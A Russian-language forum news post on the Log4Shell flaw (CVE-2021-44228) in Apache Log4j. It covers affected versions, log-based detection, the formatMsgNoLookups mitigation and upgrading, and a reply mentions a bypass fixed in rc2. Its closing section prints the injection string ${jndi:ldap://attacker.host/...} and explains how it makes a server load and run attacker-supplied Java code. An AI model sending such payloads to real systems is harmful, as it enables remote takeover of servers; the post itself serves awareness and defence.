Что нового

News Новый zero-day в Log4j Java library уже эксплуатируется (От Cloudflare до Apple)

Vander 0

Vander

Команда форума
10.11.2019
495
1 158
1639138516402.png

Недавно обнаруженная уязвимость нулевого дня в широко используемой библиотеке журналов Java Apache Log4j легко эксплуатируется и позволяет злоумышленникам получить полный контроль над уязвимыми серверами.

Уязвимость, отслеживаемая как CVE-2021-44228, классифицируется как серьезная и позволяет выполнять удаленный код без аутентификации, поскольку пользователь, запускающий приложение, использует библиотеку ведения журналов Java. CERT New Zealand предупреждает, что он уже эксплуатируется в дикой природе.

Затронуты все системы и службы, использующие библиотеку ведения журналов Java, Apache Log4j между версиями 2.0 и 2.14.1, включая многие службы и приложения, написанные на Java.

Уязвимость была впервые обнаружена в Minecraft, но исследователи предупреждают, что облачные приложения также уязвимы. Он также используется в корпоративных приложениях, и вполне вероятно, что многие продукты окажутся уязвимыми по мере того, как станет больше известно о недостатке.

Сообщение в блоге исследователей LunaSec предупреждает, что любой, кто использует Apache Struts, «скорее всего, уязвим».

LunaSec сказал: «Учитывая, насколько распространена эта библиотека, влияние эксплойта (полный контроль над сервером) и насколько легко ее использовать, влияние этой уязвимости довольно серьезное. Мы для краткости называем ее «Log4Shell».

Организации могут определить, затронуты ли они, изучив файлы журналов для любых служб, использующих уязвимые версии Log4j. Если они содержат строки, управляемые пользователем, CERT-NZ использует пример «Jndi: ldap», они могут быть затронуты.

Исправление:

Чтобы уменьшить влияние уязвимости, пользователи должны переключить log4j2.formatMsgNoLookups на true, добавив:

Код:
«- Dlog4j2.formatMsgNoLookups = True»
К команде JVM для запуска приложения.

Чтобы предотвратить использование библиотеки, настоятельно рекомендуется обновить версии Log4j до log4j-2.15.0-rc1.

«Если вы считаете, что CVE-2021-44228 на вас может повлиять на вас, Randori рекомендует всем организациям принять менталитет предполагаемого нарушения и проверять журналы на предмет необычной активности затронутых приложений», - написали исследователи кибербезопасности из Randori в своем блоге.

«Если обнаружены аномалии, мы рекомендуем вам предположить, что это активный инцидент, что вы были скомпрометированы, и отреагировать соответствующим образом».

Примеры уязвимых сервисов:

Код:
https://github.com/YfryTchsGD/Log4jAttackSurface
Эксплуатация уязвимости:
  • Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
  • JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
  • В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
 
Последнее редактирование:
id2746 0

id2746

Advanced
17.12.2019
26
51
Дополнительно:
Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.
 
Верх Низ